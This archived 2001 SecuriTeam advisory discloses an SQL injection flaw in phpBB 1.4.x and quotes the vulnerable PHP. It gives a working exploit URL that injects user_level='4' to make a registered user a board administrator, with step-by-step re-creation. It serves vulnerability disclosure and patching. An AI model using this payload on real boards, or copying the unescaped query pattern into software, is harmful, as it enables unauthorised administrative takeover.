[UNIX] phpBB Security Hole Leads to Root Compromise
From: support@securiteam.comDate: 08/06/01
- Next message: support@securiteam.com: "[UNIX] Tivoli Management Framework Security Compromise"
- Previous message: support@securiteam.com: "[TOOL] SnortSperm, a DCShop Order and Account Scanner"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [UNIX] phpBB Security Hole Leads to Root Compromise Message-Id: <20010806202025.63F5E13903@mail.der-keiler.de> Date: Mon, 6 Aug 2001 22:20:25 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
phpBB Security Hole Leads to Root Compromise
------------------------------------------------------------------------
SUMMARY
<http://www.phpbb.com/> phpBB, is an open source bulletin board created
by the phpBB group. phpBB does not properly sanitize input, and this
creates a potential problem that can lead to arbitrary SQL queries getting
executed, which essentially allows administrative access to the bulletin
board.
DETAILS
Vulnerable systems:
phpBB version 1.4.0
phpBB version 1.4.1
The problem lies in the fact that phpBB includes an algorithm in the
auth.php file that removes backslashes that PHP automatically adds to the
Get / Post /Cookie variables.
<Example code from auth.php>
if(get_magic_quotes_gpc() == 1)
{
switch($REQUEST_METHOD){
case "POST":
while (list ($key, $val) = each ($HTTP_POST_VARS)){
if( is_array($val) ){
array_walk($val, 'stripslashes_array', '');
$$key = $val;}
else{
$$key = stripslashes($val);}
}
break;
</ End example code>
Therefore, certain PHP variables submitted through a URL can reach an SQL
query with un-escaped quotes, which is not good for security reasons. In
the prefs.php file such a situation exists where a user can execute an
arbitrary query by supplying a certain value for the $viewemail variable.
< Example sql query in prefs.php >
$sql = "UPDATE users SET
user_viewemail='$viewemail',
user_theme='$themes', user_attachsig = '$sig',
user_desmile = '$smile', user_html = '$dishtml',
user_bbcode
= '$disbbcode', user_lang = '$lang' WHERE
(user_id = '$userdata[user_id]')";
</ End example code >
Example URL gives a username "l337h4x0r" level 4 (administrative)
privileges the board:
<Example URL>
http://sitename/phpBBfolder/prefs.php?save=1
&viewemail=1',user_level%3D'4'%20where%
20username%3D'l337h4x0r'%23
</ End example URL>
Re-creation:
1. Register an account on a phpBB board version 1.4.X.
2. Enter above URL with the correct site name and replace l337h4x0r with
your username.
3. Click on "Administration Panel" near the bottom of the page.
Solution:
An (unofficial) updated prefs.php version can be downloaded from:
<http://www.game-mods.com/prefs.php.txt>
http://www.game-mods.com/prefs.php.txt
ADDITIONAL INFORMATION
The information has been provided by <mailto:kill-9@modernhackers.com>
kill-9.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[UNIX] Tivoli Management Framework Security Compromise"
- Previous message: support@securiteam.com: "[TOOL] SnortSperm, a DCShop Order and Account Scanner"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
